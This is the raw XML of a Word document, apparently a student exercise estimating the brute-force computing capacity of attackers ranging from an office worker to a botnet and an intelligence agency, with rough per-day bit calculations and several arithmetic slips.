                <w:p w14:paraId="6F230D41" w14:textId="1B05C16E" w:rsidR="00831FB7" w:rsidRPr="00831FB7" w:rsidRDefault="00831FB7" w:rsidP="00831FB7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00831FB7">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="180B9448" w14:textId="2EC0582C" w:rsidR="00EB538C" w:rsidRPr="00831FB7" w:rsidRDefault="00EB538C" w:rsidP="00EB538C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                  </w:pP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F444C0D" w14:textId="5AAD5A71"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31FB7">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>1.1664x10^23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DEF7644"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B9480E">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve">2.91737x10^15 days </w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7FCC2517" w14:textId="77777777" w:rsidR="00B9480E"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4A26438C" w14:textId="4AFE614E" w:rsidR="00B9480E" w:rsidRPr="00903D82"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7.99 x 10^12 </w:t>
                  </w:r>
                  <w:r w:rsidR="000439B8">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>years</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EB538C" w:rsidRPr="00903D82" w14:paraId="4FB4219C"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0BE9FF2"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Foreign Intelligence Agency</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C0B023F" w14:textId="0B563C9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98788C">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>$2</w:t>
                  </w:r>
                  <w:r w:rsidR="00F042BF">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>B</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D620421" w14:textId="49A16F42" w:rsidR="00EB538C" w:rsidRPr="00903D82"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 x 2 exaflop supercomputing facilities</w:t>
                  </w:r>
                  <w:r w:rsidR="00EB538C" w:rsidRPr="00903D82">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>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4452647" w14:textId="0A4FA05E"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03A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>3.456x10^23 bits/day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518FD75"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9.846133 x 10^14 days</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3A41BAE7"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0BDA45CB" w14:textId="50F164FC"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2A2112">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>2.697x10^12</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="34B45DA2" w14:textId="3CB4E1B3" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="00903D82">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2082"/>
              </w:tabs>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="29A2013A" w14:textId="119056F5" w:rsidR="181B8E52" w:rsidRDefault="00903D82" w:rsidP="181B8E52">
            <w:r>
              <w:t xml:space="preserve">Note: N bits of work requires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bit decisions that need to be completed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32B655B6" w14:textId="1944AA9A" w:rsidR="00AC1CEF" w:rsidRDefault="00AC1CEF" w:rsidP="00AC1CEF">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Asumming after the office worker that the solo teenage hacker and above are able to make one bit decision per clock cycle.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="045CE5FC" w14:textId="383D9D3F" w:rsidR="00CA4D29" w:rsidRPr="00ED5F6D" w:rsidRDefault="00CA4D29" w:rsidP="00AC1CEF">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Assuming brute forcing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68C29C7F" w14:textId="56CF32E1" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="240FD2B7" w14:textId="6C70ECBF" w:rsidR="007C100A" w:rsidRDefault="007C100A" w:rsidP="181B8E52">
            <w:r>
              <w:t>Handy Site:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A3AEA36" w14:textId="026BAFCA" w:rsidR="007C100A" w:rsidRDefault="007C100A" w:rsidP="181B8E52">
            <w:hyperlink r:id="rId17" w:anchor="date" w:history="1">
              <w:r w:rsidRPr="00676B32">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://www.cpubenchmark.net/laptop.html#date</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BBCA2CB" w14:textId="77777777" w:rsidR="007C100A" w:rsidRPr="00ED5F6D" w:rsidRDefault="007C100A" w:rsidP="181B8E52"/>
          <w:p w14:paraId="4B18F8D1" w14:textId="5B938FEE" w:rsidR="181B8E52" w:rsidRPr="004458A6" w:rsidRDefault="004458A6" w:rsidP="181B8E52">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004458A6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Office Worker:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68CBD2E9" w14:textId="21D49E7E" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="005B73AE" w:rsidP="004458A6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Most Common CPU according to is the Ryzen 5: </w:t>
            </w:r>
            <w:hyperlink r:id="rId18" w:anchor="cpu-commonality" w:history="1">
              <w:r w:rsidRPr="00676B32">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://www.cpubenchmark.net/common_cpus.html#cpu-commonality</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41AE5F47" w14:textId="2A2874F1" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="11B66F3E" w14:textId="77777777" w:rsidR="005B73AE" w:rsidRDefault="005B73AE" w:rsidP="005B73AE">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Whilst the office worker has more CPU power, they are being supervised so will be mostly limited by their own time constraints: Hence they are only capable of making 1 decision every 10 minutes. Hence, 51 per 24 Hours.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ED64B28" w14:textId="77777777" w:rsidR="005B73AE" w:rsidRDefault="005B73AE" w:rsidP="005B73AE">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="327D3F5F" w14:textId="77777777" w:rsidR="005B73AE" w:rsidRDefault="005B73AE" w:rsidP="005B73AE">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005B73AE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Solo Teenage Hacker:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="330E8282" w14:textId="77777777" w:rsidR="00163D99" w:rsidRPr="00163D99" w:rsidRDefault="003A4F61" w:rsidP="003A4F61">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>I am assuming that this person will spend approximately 75%</w:t>
            </w:r>
            <w:r w:rsidR="004D16C5">
              <w:t xml:space="preserve"> ($7.5k)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> of their available funds on the PC equipment. And then the remaining will be on training, skills development and tools. </w:t>
            </w:r>
            <w:r w:rsidR="005656F6">
              <w:t xml:space="preserve"> I am assuming by this they will have th</w:t>
            </w:r>
            <w:r w:rsidR="00163D99">
              <w:t xml:space="preserve">e </w:t>
            </w:r>
            <w:r w:rsidR="005656F6">
              <w:t>computer mostly dedicated or almost full utilisation</w:t>
            </w:r>
            <w:r w:rsidR="00163D99">
              <w:t xml:space="preserve"> and under the assumption they are only using a nominal computer elements such as a GPU and/or CPU but not HPC grade components.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70723FD5" w14:textId="77777777" w:rsidR="005B73AE" w:rsidRPr="00717063" w:rsidRDefault="00163D99" w:rsidP="003A4F61">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00717063">
              <w:t>Get something similar to a pretty well upgraded Lenovo P3 Tower- But doesn’t know how to use GPU but can make it multithreaded</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C6B792B" w14:textId="77777777" w:rsidR="00EB538C" w:rsidRPr="00EB538C" w:rsidRDefault="00EB538C" w:rsidP="00EB538C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <m:oMath>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                </w:rPr>
                <m:t>24threads×5.7GHz×24</m:t>
              </m:r>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                </w:rPr>
                <m:t>hours≈</m:t>
              </m:r>
              <m:f>
                <m:fPr>
                  <m:ctrlPr>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      <w:i/>
                    </w:rPr>
                  </m:ctrlPr>
                </m:fPr>
                <m:num>
                  <m:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                    </w:rPr>
                    <m:t>3,283,200,000,000bits</m:t>
                  </m:r>
                </m:num>
                <m:den>
                  <m:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                    </w:rPr>
                    <m:t>day</m:t>
                  </m:r>
                </m:den>
              </m:f>
            </m:oMath>
          </w:p>
          <w:p w14:paraId="742B561C" w14:textId="77777777" w:rsidR="00EB538C" w:rsidRDefault="003317F4" w:rsidP="00EB538C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003317F4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Small Business Hacking</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F60E685" w14:textId="77777777" w:rsidR="003317F4" w:rsidRDefault="000B00DE" w:rsidP="00473801">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="000B00DE">
              <w:t>Assuming</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> this business has the resources for 10 people/PCs to simultaneously run through the processes and they are all equivalent to a Lenovo workstation and then have to utilise the 100K for the compute and the infrastructure costs of their network. They will be able to achieve 10 times more.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="519E7431" w14:textId="709DFD88" w:rsidR="000B00DE" w:rsidRDefault="000B00DE" w:rsidP="000B00DE">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Hence:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="516FFCE4" w14:textId="01BDBF3A" w:rsidR="006576AD" w:rsidRDefault="00000000" w:rsidP="00DE490B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
            </w:pPr>
            <m:oMathPara>
              <m:oMath>
                <m:f>
                  <m:fPr>
                    <m:ctrlPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                        <w:i/>
                      </w:rPr>
                    </m:ctrlPr>
                  </m:fPr>
                  <m:num>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      </w:rPr>
                      <m:t>3,283,200,000,000bits</m:t>
                    </m:r>
                  </m:num>
                  <m:den>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      </w:rPr>
                      <m:t>day</m:t>
                    </m:r>
                  </m:den>
                </m:f>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>×10≈</m:t>
                </m:r>
                <m:f>
                  <m:fPr>
                    <m:ctrlPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                        <w:i/>
                      </w:rPr>
                    </m:ctrlPr>
                  </m:fPr>
                  <m:num>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      </w:rPr>
                      <m:t>30,283,200,000,000bits</m:t>
                    </m:r>
                  </m:num>
                  <m:den>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      </w:rPr>
                      <m:t>day</m:t>
                    </m:r>
                  </m:den>
                </m:f>
              </m:oMath>
            </m:oMathPara>
          </w:p>
          <w:p w14:paraId="72EB9F6C" w14:textId="77777777" w:rsidR="006576AD" w:rsidRDefault="006576AD" w:rsidP="006576AD">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006576AD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Large Organisation Hacking :</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C3B7F08" w14:textId="77777777" w:rsidR="006576AD" w:rsidRDefault="006576AD" w:rsidP="006576AD">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> A large organisation will likely implement a HPC with that budget in a server rack form</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FEF9105" w14:textId="77777777" w:rsidR="006576AD" w:rsidRDefault="006576AD" w:rsidP="008A7E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="006576AD">
              <w:t>I found a moderately setup rack with 2xAMD EPYC™ 9355 Processor 32-core 3.55GHz 256MB Cache (280W) per unit for $75-100k so they could</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006576AD">
              <w:t>impl</w:t>
            </w:r>
            <w:r w:rsidR="00105939">
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidRPr="006576AD">
              <w:t>ment about 18 when you then account for other infrastructure costs</w:t>
            </w:r>
            <w:r w:rsidR="008A7E74">
              <w:t>. Assuming each core is in full utilisation:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C07CC6C" w14:textId="77777777" w:rsidR="008A7E74" w:rsidRPr="008B59EF" w:rsidRDefault="008A7E74" w:rsidP="008A7E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
            </w:pPr>
            <m:oMathPara>
              <m:oMath>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>≈18×2×32×3.55×</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 4,089,600,000,000 bits/second</m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
          <w:p w14:paraId="0AB88AA9" w14:textId="77777777" w:rsidR="008B59EF" w:rsidRPr="00553FBC" w:rsidRDefault="008B59EF" w:rsidP="008A7E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
            </w:pPr>
            <m:oMathPara>
              <m:oMath>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>24×4,089,600,000,000= 98,150,400,000,000 per day</m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
          <w:p w14:paraId="3D6090E6" w14:textId="77777777" w:rsidR="00553FBC" w:rsidRDefault="00553FBC" w:rsidP="008A7E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="367CBC45" w14:textId="77777777" w:rsidR="00553FBC" w:rsidRDefault="00553FBC" w:rsidP="00553FBC">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00553FBC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Large Botnet</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="648D88F5" w14:textId="77777777" w:rsidR="00FA64B7" w:rsidRDefault="00DE490B" w:rsidP="00DE490B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Assuming 5 million devices of the office workers device</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E55A46E" w14:textId="77777777" w:rsidR="00DE490B" w:rsidRDefault="00DE490B" w:rsidP="00DE490B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>The 25 Million dollar budget is to maintain exploitation services and infrastructure to command the bot net.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A811074" w14:textId="77777777" w:rsidR="00DE490B" w:rsidRDefault="00E05570" w:rsidP="00DE490B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Hence using the office worker PC:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35D67C23" w14:textId="77777777" w:rsidR="00E05570" w:rsidRPr="00831FB7" w:rsidRDefault="00B9509C" w:rsidP="00E05570">
            <m:oMath>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                </w:rPr>
                <m:t>5000000×6×4.7×</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×≈3.384×</m:t>
              </m:r>
              <m:sSup>
                <m:sSupPr>
                  <m:ctrlPr>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      <w:i/>
                    </w:rPr>
                  </m:ctrlPr>
                </m:sSupPr>
                <m:e>
                  <m:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                    </w:rPr>
                    <m:t>10</m:t>
                  </m:r>
                </m:e>
                <m:sup>
                  <m:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                    </w:rPr>
                    <m:t>18</m:t>
                  </m:r>
                </m:sup>
              </m:sSup>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                </w:rPr>
                <m:t xml:space="preserve">bits/day </m:t>
              </m:r>
            </m:oMath>
            <w:commentRangeEnd w:id="0"/>
            <w:r w:rsidR="005A08DC" w:rsidRPr="00831FB7">
              <w:rPr>
                <w:rStyle w:val="CommentReference"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:commentReference w:id="0"/>
            </w:r>
          </w:p>
          <w:p w14:paraId="71A6BC63" w14:textId="77777777" w:rsidR="00831FB7" w:rsidRDefault="00831FB7" w:rsidP="00E05570">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00831FB7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Crypto Miner</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F456CC0" w14:textId="77777777" w:rsidR="00831FB7" w:rsidRDefault="00B55423" w:rsidP="00B55423">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Assuming the hardware can compute per second the same as its hash rates, ignoring the differences that may lie within the ASIC algorithm</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E6D1BAD" w14:textId="77777777" w:rsidR="00B55423" w:rsidRDefault="00B55423" w:rsidP="00B55423">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Hardware costs 10k each and is a normal device hence with the budget there are 5000 devices</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04F6881D" w14:textId="54890C09" w:rsidR="00B55423" w:rsidRPr="00831FB7" w:rsidRDefault="00B55423" w:rsidP="00B55423">
            <m:oMathPara>
              <m:oMath>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>5000×270×</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×24×3600≈</m:t>
                </m:r>
                <m:r>
                  <m:rPr>
                    <m:sty m:val="p"/>
                  </m:rPr>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                    <w:color w:val="333333"/>
                    <w:lang w:eastAsia="en-AU"/>
                  </w:rPr>
                  <m:t>1.1664x</m:t>
                </m:r>
                <m:sSup>
                  <m:sSupPr>
                    <m:ctrlPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                        <w:color w:val="333333"/>
                        <w:lang w:eastAsia="en-AU"/>
                      </w:rPr>
                    </m:ctrlPr>
                  </m:sSupPr>
                  <m:e>
                    <m:r>
                      <m:rPr>
                        <m:sty m:val="p"/>
                      </m:rPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:eastAsia="Times New Roman" w:hAnsi="Cambria Math" w:cs="Open Sans"/>
                        <w:color w:val="333333"/>
                        <w:lang w:eastAsia="en-AU"/>
                      </w:rPr>
                      <m:t>10</m:t>
                    </m:r>
                  </m:e>
                  <m:sup>
                    <m:r>
                      <m:rPr>
                        <m:sty m:val="p"/>
                      </m:rP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37FBCA32" w14:textId="64EA650B" w:rsidR="00B55423" w:rsidRDefault="00433997" w:rsidP="00B55423">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00433997">
              <w:rPr>
                <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t>Foreign Intelligence Agency:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E72CB05" w14:textId="3D6BDD47" w:rsidR="00FB0A49" w:rsidRDefault="0018464D" w:rsidP="00FB0A49">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A90EF5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t>Note that we likely don’t have public knowledge of all processors available to some intelligence agencies which can in some cases perform exceptionally better than an estimate</w:t>
            </w:r>
            <w:r w:rsidR="00A90EF5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Open Sans"/>
                <w:color w:val="333333"/>
                <w:lang w:eastAsia="en-AU"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FDE11F6" w14:textId="355B5199" w:rsidR="00A90EF5" w:rsidRDefault="00A90EF5" w:rsidP="00FB0A49">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
